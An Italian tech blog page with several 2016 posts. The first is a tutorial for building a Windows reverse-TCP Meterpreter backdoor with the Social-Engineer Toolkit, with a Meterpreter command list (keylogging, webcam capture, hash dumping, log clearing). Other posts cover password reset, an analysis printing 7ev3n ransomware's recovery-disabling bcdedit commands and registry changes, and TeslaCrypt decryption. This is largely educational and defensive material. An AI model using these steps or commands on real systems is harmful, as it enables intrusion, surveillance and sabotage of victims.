venerdì 4 marzo 2016

Kali Linux: Creare una backdoor per Windows utilizzando SET

Social-Engineer Toolkit (SET), scritto da David Kennedy (ReL1K), è un insieme di tool progettati per eseguire attacchi basati sull'ingegneria sociale. In quest'articolo mostrerò uno dei possibili attacchi realizzabili con questo toolkit incluso in Kali Linux che prevede la creazione di un file eseguibile che, se eseguito sulla macchina della vittima, apre una backdoor.
                 
ATTENZIONE:
Danneggiare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.

  • La prima operazione da effettuare è quella di avviare SET: da terminale eseguire il comando setoolkit oppure, dall'interfaccia grafica di Kali Linux (Versione 2016.1), cliccare su Applications>Social Engineering Tools>Social Engineering Toolkit.
    Social Engineering Tools
    FIG 1 - Social Engineering Tools
  • Dal menu che appare selezionare l'opzione 1) Social-Engineering Attacks
    FIG 2 - Social-Engineering Attacks
  • Selezionare l'opzione 4) Create a Payload and Listener.
    Create a Payload and Listener
    FIG 3 - Create a Payload and Listener
  • Selezionare 2) Windows Reverse_TCP Meterpreter.
    Windows Reverse_TCP Meterpreter
    FIG 4 - Windows Reverse_TCP Meterpreter
  • Indicare l'indirizzo IP che il payload deve contattare una volta che viene eseguito dalla vittima (indirizzo IP di chi attacca).
    IP Address
    FIG 5 - IP Address
  • Specificare la porta del listener (in genere 443) confermando con invio. Verrà creato un eseguibile chiamato payload.exe (in /root/.usr/payload.exe) che consente di aprire una backdoor sulla workstation della vittima.
    Porta su cui attendere la comunicazione del payload
    FIG 6 - Porta su cui attendere la comunicazione del payload

    Percorso del payload.exe da eseguire sulla macchina della vittima
    FIG 7 - Percorso del payload.exe da eseguire sulla macchina della vittima
  • A questo punto viene richiesto se si intende avviare il listener sulla macchina di chi sta eseguendo l'attacco. Digitare yes seguito da invio per avviare la msfconsole.
    Avvio del listener
    FIG 8 - Avvio del listener
  • Una volta che msfconsole è stata avviata non resta che attendere che il file payload.exe venga eseguito sulla macchina della vittima e verrà aperta una sessione di Meterpreter.
    Sessione Meterpreter
    FIG 9 - Sessione Meterpreter
  • Digitare il comando sessions -i 1 dove 1 rappresenta il numero della sessione che si intende selezionare (in FIG 9 è possibile vedere il numero della sessione nella dicitura session 1 opened)
    Attivare la sessione
    FIG 10 - Attivare la sessione
  • Per fare in modo che meterpreter rimanga aperto è necessario migrare il payload su un altro processo. Per eseguire questa operazione è necessario disporre del PDI (process ID) di un altro processo. Usare il comando ps per visualizzare i processi attualmente in esecuzione sulla macchina vittima. Una volta individuato il PID su cui vogliamo migrare utilizziamo il comando
    migrate <PID del processo>
    ad es
    migrate 4878
Digitando help visualizziamo l'elenco dei comandi che possiamo eseguire sulla macchina della vittima




Possiamo riavviare la postazione, trasferire file, terminare processi, prendere il controllo della webcam/microfono, ecc.

Di seguito un elenco dei comandi che è possibile eseguire:

Core Commands
=============

    Command                   Description
    -------                        -----------
    ?                               Help menu
    background                Backgrounds the current session
    bgkill                         Kills a background meterpreter script
    bglist                         Lists running background scripts
    bgrun                        Executes a meterpreter script as a background thread
    channel                     Displays information or control active channels
    close                         Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                           Terminate the meterpreter session
    get_timeouts             Get the current session timeout values
    help                          Help menu
    info                           Displays information about a Post module
    irb                            Drop into irb scripting mode
    load                          Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                     Migrate the server to another process
    quit                           Terminate the meterpreter session
    read                          Reads data from a channel
    resource                    Run the commands stored in a file
    run                            Executes a meterpreter script or Post module
    set_timeouts              Set the current session timeout values
    sleep                         Force Meterpreter to go quiet, then re-establish session.
    transport                   Change the current transport mechanism
    use                           Deprecated alias for 'load'
    uuid                          Get the UUID for the current session
    write                         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------             -----------
    cat                 Read the contents of a file to the screen
    cd                  Change directory
    dir                  List files (alias for ls)
    download        Download a file or directory
    edit                Edit a file
    getlwd            Print local working directory
    getwd             Print working directory
    lcd                 Change local working directory
    lpwd               Print local working directory
    ls                   List files
    mkdir             Make directory
    mv                 Move source to destination
    pwd                Print working directory
    rm                  Delete the specified file
    rmdir              Remove directory
    search            Search for files
    show_mount   List all mount points/logical drives
    upload            Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------             -----------
    arp                 Display the host ARP cache
    getproxy         Display the current proxy configuration
    ifconfig           Display interfaces
    ipconfig          Display interfaces
    netstat           Display the network connections
    portfwd          Forward a local port to a remote service
    route             View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------             -----------
    clearev           Clear the event log
    drop_token     Relinquishes any active impersonation token.
    execute          Execute a command
    getenv           Get one or more environment variable values
    getpid            Get the current process identifier
    getprivs         Attempt to enable all privileges available to the current process
    getsid            Get the SID of the user that the server is running as
    getuid            Get the user that the server is running as
    kill                 Terminate a process
    ps                  List running processes
    reboot            Reboots the remote computer
    reg                Modify and interact with the remote registry
    rev2self         Calls RevertToSelf() on the remote machine
    shell              Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    suspend         Suspends or resumes a list of processes
    sysinfo          Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------              -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop        Get the current meterpreter desktop
    idletime             Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start    Start capturing keystrokes
    keyscan_stop     Stop capturing keystrokes
    screenshot         Grab a screenshot of the interactive desktop
    setdesktop         Change the meterpreters current desktop
    uictl                  Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------              -----------
    record_mic       Record audio from the default microphone for X seconds
    webcam_chat   Start a video chat
    webcam_list     List webcams
    webcam_snap  Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------             -----------
    getsystem       Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------             -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------             -----------
    timestomp     Manipulate file MACE attributes



lunedì 15 febbraio 2016

Windows Quick Tip: Visualizzare la data e ora di compilazione di un file eseguibile

Quando si installa un'applicazione può capitare che la data di creazione del file eseguibile (.exe) venga impostata alla data attuale. I file eseguibili contengono al loro interno dei metadati. Alcuni di questi sono visibili nella finestra relativa alle proprietà del file, altri, come la data e l'ora di compilazione originale, possono essere estratti dal file tramite appositi tool. 
Conoscere la data di compilazione originale del file eseguibile può essere utile per individuare la versione più recente.
Un tool che permette di estrarre tale informazione è PEStamp scaricabile da http://trax.x10.mx/pestamp.exe. Il tool occupa pochi KB e può essere lanciato dal prompt dei comandi passandogli come parametro il percorso e nome del file eseguibile.

Ad es.
pestamp <nome_file.exe>


PEStamp
FIG 1 - PEStamp

Per richiamare il tool da più percorsi come se fosse un comando nativo si può inserire il percorso di PEStamp.exe all'interno della variabile di sistema PATH oppure si può copiare il file all'interno di c:\windows.

Altri tool prodotti dallo stesso autore (FS1) si possono scaricare da http://trax.x10.mx/apps.html

giovedì 11 febbraio 2016

MS Word Quick Tip: Aggiungere un capolettera al documento

Per rendere più accattivante un documento MS Word è possibile aggiungere un capolettera procedendo nel seguente modo:

  • Aprire il documento MS Word che si intende modificare;
  • Selezionare il carattere che si intende trasformare in capolettera;
  • Dal menu Inserisci nella barra multifunzione selezionare l'opzione Capolettera presente nella sezione Testo.
    
    Capolettera
    FIG 1 - Capolettera
  • Verrà mostrato un menù popup che permette di scegliere tra più opzioni:
    Nessuno - Elimina un capolettera precedentemente impostato
    Interno - Si tratta del classico capolettera inserito in uno spazio ricavato nel corpo del testo
    Esterno - Il capolettera viene inserito nel margine sinistro
    Opzioni capolettera... - consente di specificare opzioni personalizzate per il capolettera. 

    
    Menu Capolettera
    FIG 2 - Menu Capolettera
L'effetto delle varie opzioni viene visualizzato semplicemente sorvolando con il mouse la relativa opzione. Una volta individuato l'effetto voluto cliccare sull'opzione desiderata.
Opzioni capolettera consente, attraverso una finestra di  dialogo, di impostare ulteriori opzioni aggiuntive come la grandezza del carattere, il numero di righe occupate e la spaziatura rispetto al testo. 

Opzioni Capolettera
FIG 3 - Opzioni Capolettera

Il capolettera viene inserito all'interno di un riquadro di testo separato e può essere spostato, modificato e ridimensionato anche successivamente. 

Esempio di capolettera interno
FIG 4 - Esempio di capolettera interno

lunedì 8 febbraio 2016

Windows: Resettare/eliminare la password di Windows tramite Offline NT Password & Registry Editor

Può capitare di avere la necessità di accedere al sistema ma di aver dimenticato la password. In questi casi esistono diversi metodi che ci consentono di resettare/cancellare la password di accesso locale (non quella di dominio) e permetterci l'accesso al sistema. Uno di questi metodi consiste nell'utilizzo dell'ottimo tool Offline NT Password & Registry Editor.

ATTENZIONE:
Danneggiare o violare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.

Da http://pogostick.net/~pnh/ntpasswd/ è possibile scaricare sia l'immagine ISO che i file per creare una pendrive USB bootable. I file vengono scaricati in formato compresso .zip quindi dovranno essere scompattati prima di poterli utilizzare.

Download Offline NT Password & Registry Editor
FIG 1 - Download Offline NT Password & Registry Editor
L'immagine ISO può essere masterizzata su cd/dvd tramite un programma di masterizzazione oppure è possibile creare una pendrive bootable tramite il tool Rufus.
Scaricando i file per la creazione di una pendrive, invece, dobbiamo copiare tutti i file sulla pendrive, aprire un prompt dei comandi come amministratore e digitare il seguente comando
X:\syslinux.exe -ma X:
dove al posto della X va indicata la lettera della nostra pendrive.

Adesso si dispone del supporto con cui si andrà ad eseguire il boot del sistema. Il tool ci chiederà di selezionare alcune opzioni (la maggior parte già selezionate di default) prima di permetterci di resettare la password. Di seguito mostrerò passo passo le operazioni da effettuare con relative immagini per semplificare la vita anche a chi è poco pratico.
Prima di iniziare è utile sapere che le password degli account di Windows vengono crittografate e memorizzate all'interno del file SAM (un file senza estensione) presente in C:\Windows\System32\config. Tale file non è accessibile/modificabile quando Windows è in esecuzione. Ecco perché è necessario creare un supporto con cui effettuare il boot del sistema senza caricare Windows. I più esperti, prima di procedere alla cancellazione della password, possono effettuare il backup dei file SAM e SYSTEM (quest'ultimo contiene il valore Bootkey con cui viene crittografato il file SAM). In questo modo è possibile ripristinare la vecchia password ricopiando semplicemente i file nella loro posizione originale.

Eliminare la password di un determinato account:
  • Eseguire il boot dal supporto creato (CD/DVD o pendrive) e quando a video appare boot: come mostrato in figura FIG 2, premere invio per proseguire.
    Offline NT Password & Registry Editor, Boot
    FIG 2 - Offline NT Password & Registry Editor, Boot
  • Il tool cerca di individuare la partizione dove è installato il sistema operativo e, al termine dell'analisi, ci propone le installazioni di Windows che ha individuato. Digitare il numero dell'installazione di Windows su cui si intende agire e premere invio. L'opzione di default, e più probabile, è indicata tra parentesi quadre (ad es. [1]). Premendo solo invio viene accettata l'opzione di default proposta dal tool.
    Offline NT Password & Registry Editor, installazioni di Windows
    FIG 3 - Offline NT Password & Registry Editor, installazioni di Windows
  • Nel caso in cui venisse richiesto, confermare il percorso del registro di sistema (Windows/System32/config) premendo invio.
  • Confermare l'opzione [1] Password reset [sam] premendo invio per procedere al reset della password
    Offline NT Password & Registry Editor, Password reset [sam]
    FIG 4 - Offline NT Password & Registry Editor, Password reset [sam]
  • Premere nuovamente invio per confermare l'opzione 1 - Edit user data and passwords
    
    Offline NT Password & Registry Editor, Edit user data and passwords
    FIG 5 - Offline NT Password & Registry Editor, Edit user data and passwords
  • Digitare il RID dell'account a cui si intende resettare la password e premere invio (ad es. in figura FIG 6 per resettare la password dell'utente Virtual digitare 03e9 seguito da invio)
    Offline NT Password & Registry Editor, RID user account
    FIG 6 - Offline NT Password & Registry Editor, RID user account
  • Digitare 1 per l'opzione Clear (blank) user password e premere invio
    
    Offline NT Password & Registry Editor, Clear (blank) user password
    FIG 7 - Offline NT Password & Registry Editor, Clear (blank) user password
  • La password è stata eliminata. Digitare q seguito da invio per uscire (Quit editing user, back to user select) quindi ancora q e invio per terminare (FIG 8 e 9)
    Offline NT Password & Registry Editor, Quit editing user, back to user select
    FIG 8 - Offline NT Password & Registry Editor, Quit editing user, back to user select
    Offline NT Password & Registry Editor, Quit (you will be asked if there is something to save)
    FIG 9 - Offline NT Password & Registry Editor, Quit (you will be asked if there is something to save)
  • A questo punto viene chiesto di confermare la scrittura del registro. Premere Y seguito da invio e attendere che la scrittura del Security Account Manager (SAM)
    Offline NT Password & Registry Editor, About to write file(s) back! Do it?
    FIG 10 - Offline NT Password & Registry Editor, About to write file(s) back! Do it?
  • Terminata la scrittura del file SAM viene chiesto se si intende eseguire nuovamente il tool. Confermare l'opzione N proposta premendo invio
    FIG 11 - Offline NT Password & Registry Editor, New run?
  • Non resta che riavviare normalmente il sistema dopo aver rimosso il supporto (CD/DVD o pendrive). La password non ci verrà più richiesta.
    Offline NT Password & Registry Editor, Reboot
    FIG 12 - Offline NT Password & Registry Editor, Reboot

Il metodo presentato funziona solo per il reset degli account locali del sistema. Nel caso in cui il disco sia criptato (ad es. con bitlocker) il tool non funziona. Se l'utente ha criptato qualche file o cartella tramite EFS (Encrypting File System) o Bitlocker, il contenuto di tali file/cartelle risulterà non accessibile finché non verrà ricordata la password originale.

martedì 2 febbraio 2016

Ransomware 7ev3n

In circolazione è stato individuato un nuovo ransomware molto aggressivo, il suo nome è 7ev3n. Questo ransomware, oltre a cifrare i dati dell'utente e a richiedere un riscatto di 13 bitcoin (il riscatto più elevato fin'ora registrato), compromette anche il sistema operativo modificando le impostazioni di Windows e le modalità di avvio impedendo l'accesso al sistema in modalità provvisoria e inibendo le opzioni di ripristino.

Il ransomware è stato analizzato in dettaglio da bleepingcomputer 

Al momento il ransomware 7ev3n non è ancora molto diffuso ma è molto pericoloso: una volta infettato il sistema provvede ad eseguire una scansione di tutti i drive connessi, quindi procede a cifrare alcuni file rinominandoli in maniera sequenziale e attribuendo l'estensione R5A (ad es. 1.R5A, 2.R5A ecc). 

Al momento le estensioni interessate dal ransomware sono:
.dbf, .arw, .txt, .doc, .docm, .docx, .zip, .rar, .xlsx, .xlsb, .xlsm, .pdf, .jpg, .jpe, .jpeg, .sql, .mdf, .accdb, .mdb, .odb, .odm, .odp, .ods

Terminata la crittografia dei dati viene visualizzato il messaggio di richiesta del riscatto.

7ev3n richiesta di riscatto (immagine di bleepingcomputer)
FIG 1 - 7ev3n richiesta di riscatto (immagine di bleepingcomputer)

Il ransomware crea diversi file all'interno della cartella %LocalAppData% tra cui:
  • bcd.bat
    All'interno di tale file sono presenti comandi BCDEDIT che disabilitano le opzioni di avvio avanzato e di recovery di Windows.
  • del.bat
    Cancella l'installer del ransomware.
  • system.exe
    Questo è l'eseguibile principale del ransomware che provvede alla crittografia dei file e alla visualizzazione del messaggio di riscatto .
  • time.e
    Il file contiene il timestamp di quando è avvenuta l'infezione.
  • uac.exe
    Questo eseguibile consente ai vari componenti del ransomware di essere eseguiti con privilegi di amministratore senza che venga visualizzato il messaggio UAC.
Inoltre vengono creati i seguenti file:
C:\Windows\System32\Tasks\uac
C:\Windows\System32\elsext.dll

Il contenuto del file bcd.bat è il seguente
 bcdedit /set {current} bootems no 
 bcdedit /set {current} advancedoptions off 
 bcdedit /set {current} optionsedit off 
 bcdedit /set {current} bootstatuspolicy IgnoreAllFailures 
 bcdedit /set {current} recoveryenabled off
 del %0

Il ransomware provvede anche a disabilitare, tramite chiavi di registro, le funzioni normalmente usate per riprendere il controllo di un sistema Windows, come la combinazione di tasti ALT+TAB, Task Manager, la finestra di dialogo Esegui e vengono disabilitati i tasti  F1, F10, F3, F4, Invio, Esc, Alt, Ctrl,Windows, Shift, Bloc Num, Alt Gr, Tab.  La chiave di registro modificata è:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" "Scancode Map" = "00000000 00000000 17000000 00003800 000038e0 00005be0 00005ce0 00003600 00001d00 00001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000"

altre chiavi di registro create dal ransomware sono
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62EC9C46-634C-4957-8A5C-4566462D0CE6}
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\uac
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\Users\[login_name]\AppData\Local\system.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted"
  • HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys "Flags"  = 506
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "System"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" "rgd_bcd_condition"  = 1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" "EnableLUA"  = 0

Il task creato in C:\Windows\System32\Tasks\uac  esegue le operazioni sopra indicate ad ogni login, assicurandosi che il ransomware prenda il controllo del sistema prima di ogni altra applicazione.


Rimuovere 7ev3n
Al momento non esiste un metodo per decriptare i dati ma seguendo alcuni passaggi è possibile rendere il sistema operativo nuovamente usabile. 

Il metodo più semplice per ripristinare le funzionalità del sistema operativo prevede l'utilizzo del disco di ripristino con cui eseguire il boot del sistema. Quando richiesto selezionare il ripristino del sistema e quindi avviare il Prompt dei comandi.

Opzioni di ripristino del sistema
FIG 2 - Opzioni di ripristino del sistema

La prima operazione da fare, dal Prompt dei comandi, è quella di riabilitare le opzioni di avvio di Windows con i seguenti comandi
bcdedit /set {default} bootems yes
bcdedit /set {default} advancedoptions on
bcdedit /set {default} recoveryenabled on
bcdedit /set {default} bootstatuspolicy DisplayAllFailures 

A questo punto possiamo procedere al riavvio del sistema in modalità provvisoria con prompt dei comandi e cancellare i seguenti file:
%LocalAppData%\bcd.bat
C:\Windows\System32\Tasks\uac

Per quanto riguarda il file %LocalAppData%\system.exe conviene procedere alla sua rinomina (magari modificando l'estensione in modo da evitare eventuali esecuzioni "accidentali") in quanto potrebbe essere necessario in futuro nel caso venga individuato un metodo per il recupero dei file criptati.
Gli altri file del ransomware creati in %LocalAppData% (del.bat, time.e, uac.exe) non rappresentano un pericolo ma volendo possono essere eliminati.

Infine non resta che rimuovere i seguenti valori presenti nel registro di sistema
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" "Scancode Map" 

Riavviare il sistema normalmente e procedere alla scansione con un antivirus e un antimalware aggiornati.

mercoledì 27 gennaio 2016

Ransomware TeslaCrypt

Aggiornamento del 19.05.2016


I server di TeslaCrypt chiudono e gli sviluppatori hanno rilasciato la master key utile per decriptare i dati da tutte le versioni di TeslaCrypt. Per maggiori informazioni potete cliccare QUI



Nell'articolo Ransomware Ransom32  ho già parlato di ransomware: un tipo di malware che prende il controllo del sistema (bloccandone l'accesso e/o cifrandone i dati) e richiede un riscatto per lo sblocco.
In quest'articolo tratterò un altro tipo di ransomware piuttosto diffuso, TeslaCrypt , soffermandomi sul recupero dei dati cifrati
Le prime segnalazioni di questo ransomware risalgono a febbraio 2015. Il punto debole delle prime versioni di TeslaCrypt era la gestione della chiave di cifratura. La  chiave, infatti, veniva memorizzata sul disco del sistema infetto rendendo relativamente semplice il recupero dei dati. Le successive versioni del ransomware, oltre all'utilizzo di una cifratura più sofisticata (le chiavi vengono generate tramite l’algoritmo a curve ellittiche ECDH Elliptic curve Diffie–Hellman), presentano alcun accorgimenti che prevengono l’identificazione dei server a cui il malware si connette (server di comando e controllo). I server si trovano sulla rete TOR e il ransomware comunica con essi attraverso tor2web.
In linea generale il modo di operare di TeslaCrypt è analogo a quello della maggior parte degli altri ransomware in circolazione: una volta installato segretamente sul sistema della vittima procede a cifrare i dati con il sistema AES. Il ransomware viene diffuso attraverso allegati alle email oppure tramite apposite pagine web. Dopo aver cifrato un file il ransomware aggiunge una nuova estensione che varia in base alla versione del malware (.xxx, .ttt, .abcor, .micro, .ecc, .ezz, .exx, .xyz, .zzz, .aaa, .abc, .ccc, .vvv) inoltre provvede a cancellare le copie Shadow Volume e i punti di ripristino.  Una volta terminata la cifratura dei documenti della vittima viene mostrato il messaggio di riscatto e vengono creati i seguenti file sul desktop e in altre cartelle: Howto_Restore_FILES.BMP, Howto_Restore_FILES.HTM, Howto_Restore_FILES.TXT. Questi 3 file contengono informazioni su come pagare il riscatto per poter recuperare i dati.

Sono state individuate e analizzate diverse varianti in circolazione di TeslaCrypt, la maggior parte di esse creano un file eseguibile all'interno di %AppData% (ad es. c:\Utenti\<nomeutente>\Appdata\Roaming\<nome file.exe>) mentre le chiavi di registro che vengono modificate sono
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ Qui dovrebbe esserci un richiamo al file .exe in %AppData%
HKCU\Software\
HKCU\Software\xxxsys


Le estensioni dei file interessate da TeslaCrypt sono:
.sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, .forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt

Come rimuovere il ransomware
TeslaCrypt potrebbe infiltrare e installare altri virus all'interno del sistema. Prima di tentare il recupero dei dati è necessario rimuovere il ransomware. Per rimuoverlo è possibile eseguire la scansione del sistema con un antivirus aggiornato. Un buon alleato in questi casi è un antivirus con cui eseguire il boot del sistema come Kaspersky Rescue Disk che è possibile scaricare da QUESTA PAGINA. Scaricata l'immagine è possibile masterizzarla su CD\DVD oppure creare una pendrive bootable tramite il tool rescue2USB. Eseguendo il boot con Kaspersky Rescue Disk è possibile fare in modo che l'antivirus scarichi automaticamente da internet gli aggiornamenti prima di procedere alla scansione dell'intero sistema.
Terminata la scansione ed eliminati eventuali virus trovati, avviare il sistema in modalità provvisoria quindi installare ed eseguire una scansione con una versione di Malwarebytes e/o SpyHunter aggiornata.

Recupero Dati
Per decifrare i dati è necessario recuperare la PrivateKeyBC (Chiave privata usata da TeslaCrypt come master key). Prima di poter risalire alla PrivateKeyBC è necessario ricavare SharedSecretBC (chiave calcolata tramite PrivateKeyBC, PublicKeyBC e TeslaPublicKey) e PublicKeyBC (chiave pubblica relativa all'indirizzo bitcoin). Riporto di seguito i passaggi necessari al recupero della PrivateKeyBC.

Passo 1: Procurarsi i tool TeslaDecoder e Yafu
La prima operazione da fare è quella di procurarsi i tools necessari: TeslaDecoder e Yafu. I tool possono essere scaricati dai seguenti link:
TeslaDecoder 
Yafu 

I file sono compressi (.zip) quindi è necessario procedere alla loro estrazione. Se si dispone già di questi tool è consigliabile riscaricarli in modo da essere sicuri di utilizzare l'ultima versione disponibile.
I seguenti passaggi vengono indicati anche, in inglese, all'interno del file Instructions.html fornito insieme a TeslaDecoder (sviluppato da BloodDolly di BleepingComputer).

Passo 2: Eseguire TeslaViewer per estrarre PublicKeyBC e SharedSecret1*PrivateKeyBC
All'interno di TeslaDecoder troviamo 3 file eseguibili: TeslaDecoder.exe, TeslaRefactor.exe e TeslaViewer.exeEseguire TeslaViewer.exe, cliccare sul pulsante Browse e selezionare un file cifrato da TeslaCrypt.
TeslaViewer estrae dal file una serie di informazioni. I campi che ci interessano sono PublicKeyBC e SharedSecret1*PrivateKeyBC.

TeslaViewer
FIG 1 - TeslaViewer
Cliccare sul pulsante Create work.txt per salvare tutte le informazioni all'interno del file di testo work.txt (il file di testo verrà creato all'interno della stessa cartella contenente TeslaViewer.exe).

Passo 3: Fattorizzazione di SharedSecret1*PrivateKeyBC tramite factordb.com
Ora bisogna procedere alla fattorizzazione in numeri primi del valore decimale di SharedSecret1*PrivateKeyBC. L'operazione potrebbe richiedere molto tempo ma il sito Factordb.com ci viene incontro fornendoci numerosi valori pre-calcolati.
Apriamo il file Work.txt creato con TeslaViewer e copiamo il valore decimale di  SharedSecret1*PrivateKeyBC

Work.txt e SharedSecret1*PrivateKeyBC
FIG 2 - Work.txt e SharedSecret1*PrivateKeyBC
Quindi posizioniamoci sul sito Factordb.com, incolliamo nell'apposita casella il valore copiato e clicchiamo su Factorize!
Se nella colonna Status troviamo il valore FF allora siamo fortunati e non ci resta che creare un file di testo e copiare i fattori all'interno del file (un fattore per riga). Può capitare che qualche fattore venga visualizzato come 5933269477...11<154> in questi casi dobbiamo cliccare sul fattore per visualizzare l'intero valore. Il numero tra parentesi angolari (154) indica il numero di cifre che compongono il valore. A questo punto possiamo passare al Passo 5.
Se, invece, nella colonna status, viene visualizzato il valore CF allora dobbiamo procedere in proprio alla fattorizzazione e proseguire con il Passo 4.
factordb.com
FIG 3 - factordb.com
Passo 4: Fattorizzazione di SharedSecret1*PrivateKeyBC tramite Yafu
Se non siamo stati fortunati con il sito factordb.com dobbiamo procedere autonomamente alla fattorizzazione. L'operazione potrebbe richiedere molto tempo anche su PC potenti. Per la fattorizzazione utilizzeremo il tool Yafu che abbiamo scaricato nel Passo 1. Come prima cosa procediamo alla ottimizzazione del tool in base al nostro sistema. Eseguire tuneX86.bat (per sistemi a 32 bit) o tuneX64.bat (per sistemi a 64 bit) e attendere il termine dell'operazione. La procedura di ottimizzazione potrebbe richiedere un po' di tempo e al termine verrà visualizzato il messaggio Tune Finished.

Ottimizzazione di Yafu: tuneX86 e tuneX64
FIG 4 - Ottimizzazione di Yafu: tuneX86 e tuneX64
Terminata l'ottimizzazione, aprire il file works.txt e copiare il valore decimale di  SharedSecret1*PrivateKeyBC come indicato nel Passo 3.
Lanciare factorX86.bat (per sistemi a 32 bit) o factorX64.bat (per sistemi a 64 bit). Quando richiesto incollare il valore SharedSecret1*PrivateKeyBC copiato precedentemente e premere invio.
FactorX86 e FactorX64: SharedSecret1*PrivateKeyBC
FIG 5 - FactorX86 e FactorX64: SharedSecret1*PrivateKeyBC
A questo punto viene richiesto quanti thread si intende impiegare per il calcolo della fattorizzazione. Il numero di Thread del proprio sistema può essere visualizzato da Task Manager. Si consiglia di specificare il numero di processori logici -1 (ad es. se si dispone di una CPU dual core con 4 processori logici si consiglia di indicare 3) in modo tale da non bloccare la postazione. La fattorizzazione può richiedere molto tempo (anche giorni) a seconda della potenza del sistema e del numero da fattorizzare.
FactorX86 e FactorX64: Threads
FIG 6 - FactorX86 e FactorX64: Threads
Al termine vengono visualizzati i risultati come indicato in figura FIG 7. 
FactorX86 e FactorX64: Risultati
FIG 7 - FactorX86 e FactorX64: Risultati
Copiare tutti i fattori e incollarli all'interno di un file di testo.
Risultato Fattorizzazione
FIG 8 - Risultato Fattorizzazione
PASSO 5: TeslaRefactor
Siamo quasi giunti al termine. Nella cartella TeslaDecoder avviamo il tool TeslaRefactor. Nella casella dove è indicato il messaggio <Put decimal factors here> incollare i valori forniti dalla fattorizzazione in numeri primi (quelli forniti da FactorDB.com oppure quelli calcolati tramite Yafu). Nel campo Public Key (hex) copiare il valore PublicKeyBC presente all'interno del file works.txt. Cliccare su Find Private Key per calcolare la chiave privata.
TeslaRefactor
FIG 9 - TeslaRefactor
Al termine dell'operazione prendiamo nota della chiave privata, Private key (hex), che ci servirà per decriptare i dati.
TeslaRefactor Private Key
FIG 10 - TeslaRefactor Private Key
Nel caso in cui sorgessero problemi nel calcolo della chiave privata, confrontare i valori dei campi Product (dec) e Product (Hex) con i rispettivi valori di SharedSecret1*PrivateKeyBC all'interno del file work.txt. Se i valori corrispondono allora togliere il flag alla voce Optimization e cliccare nuovamente sul pulsante Find Private Key.


Passo 6: Decriptare i dati tramite TeslaDecoder
Ora che si dispone della chiave privata è possibile procedere a decriptare i propri file utilizzando TeslaDecoder. Avviare TeslaDecoder come amministratore (cliccare con il tasto destro del mouse su TeslaDecoder.exe e selezionare Esegui come amministratore).
TeslaDecoder
FIG 11 - TeslaDecoder
